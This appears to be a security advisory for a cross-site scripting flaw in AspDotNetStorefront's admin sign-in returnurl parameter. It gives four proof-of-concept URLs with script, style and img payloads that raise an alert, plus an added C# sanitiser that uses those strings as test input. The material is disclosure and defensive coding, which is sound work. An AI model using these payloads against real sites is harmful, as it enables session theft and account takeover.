AspDotNetStorefront ReturnURL Parameter Cross-Site Scripting Vulnerability
No exploit is required. The following proof of concept is available:

http://www.example.com/aspdotnetcart/admin/signin.aspx?returnurl=1"style="background:url(javascript:alert('Vulnerable_To_XSS'))"%20"
http://www.example.com/aspdotnetcart/admin/signin.aspx?returnurl=--><script>alert('Vulnerable_To_XSS')</script>
http://www.example.com/aspdotnetcart/admin/signin.aspx?returnurl=>"><script>alert("Vulnerable_To_XSS")</script>
http://www.example.com/aspdotnetcart/admin/signin.aspx?returnurl=>"'><img%20src="javascript:alert('Vulnerable_To_XSS')">
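
One way to handle the returnurl value defensively, as an added example that is not part of the original advisory and is not AspDotNetStorefront code. The names ReturnUrlGuard, Sanitize, ForAttribute and the default.aspx fallback are hypothetical, and the input is assumed to be the already-decoded query-string value.

```csharp
using System;
using System.Net;

// Added example: hypothetical helper, not AspDotNetStorefront code.
public static class ReturnUrlGuard
{
    // Assumed fallback page name, used whenever the value is rejected.
    private const string Fallback = "default.aspx";

    // Input is assumed to be the already-decoded query-string value.
    // Only a site-relative path without markup characters is accepted.
    public static string Sanitize(string returnUrl)
    {
        if (string.IsNullOrEmpty(returnUrl)) return Fallback;
        foreach (char c in returnUrl)
        {
            // Characters that can close an attribute, a tag or a comment.
            if (c < 0x20 || c == '<' || c == '>' || c == '"' || c == '\'' || c == '\\')
                return Fallback;
        }
        // No scheme (javascript:, http:) and no scheme-relative //host form.
        // Deliberately strict: a colon anywhere in the value is refused.
        if (returnUrl.Contains(":") || returnUrl.StartsWith("//", StringComparison.Ordinal))
            return Fallback;
        return Uri.IsWellFormedUriString(returnUrl, UriKind.Relative) ? returnUrl : Fallback;
    }

    // Encode for the HTML attribute the value is written into.
    public static string ForAttribute(string returnUrl)
    {
        return WebUtility.HtmlEncode(Sanitize(returnUrl));
    }

    public static void Main()
    {
        string[] samples =
        {
            // The four returnurl values from the advisory, URL-decoded.
            "1\"style=\"background:url(javascript:alert('Vulnerable_To_XSS'))\" \"",
            "--><script>alert('Vulnerable_To_XSS')</script>",
            ">\"><script>alert(\"Vulnerable_To_XSS\")</script>",
            ">\"'><img src=\"javascript:alert('Vulnerable_To_XSS')\">",
            // Constructed benign value.
            "orders.aspx?page=2",
        };
        foreach (string s in samples)
            Console.WriteLine("{0}\n  -> {1}", s, ForAttribute(s));
    }
}
```

The allow-list check and the output encoding are independent layers: the encoding alone neutralises the attribute, tag and comment breakouts shown in the proof-of-concept URLs, and the allow-list additionally refuses absolute or scheme-bearing targets.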